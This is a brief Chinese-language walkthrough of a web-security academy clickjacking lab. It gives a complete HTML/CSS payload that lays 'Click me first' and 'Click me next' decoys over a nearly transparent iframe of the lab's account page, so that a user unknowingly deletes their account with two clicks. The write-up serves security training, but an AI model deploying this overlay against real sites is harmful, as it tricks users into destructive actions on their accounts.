# Clickjacking Lab5 這題目標是包含兩個按鈕:「刪除帳號」+「確認刪除」,要誘騙使用者點兩次。 一樣先進入網站並登入。 ![image](https://hackmd.io/_uploads/HJpanAT4lx.png) ![image](https://hackmd.io/_uploads/SkEP8lAVeg.png) 只要寫一個假的按鈕後,上面再疊一個透明的惡意按鈕,這樣使用者只會看到下層的按鈕,但觸發的效果是上層惡意按鈕的行為。 ```html= <style> iframe { position: relative; width:1500px; height: 700px; opacity: 0.1; z-index: 2; } .firstClick, .secondClick { position: absolute; z-index: 3; background: white; font-size: 22px; padding: 10px; cursor: pointer; } .firstClick { top: 525px; left: 185px; } .secondClick { top: 320px; left: 345px; } </style> <div class="firstClick">Click me first</div> <div class="secondClick">Click me next</div> <iframe src="https://0ab90039048a13c881e0660b00710058.web-security-academy.net/my-account?"></iframe> ``` 完成。 ![image](https://hackmd.io/_uploads/rJhfXeRVel.png) ---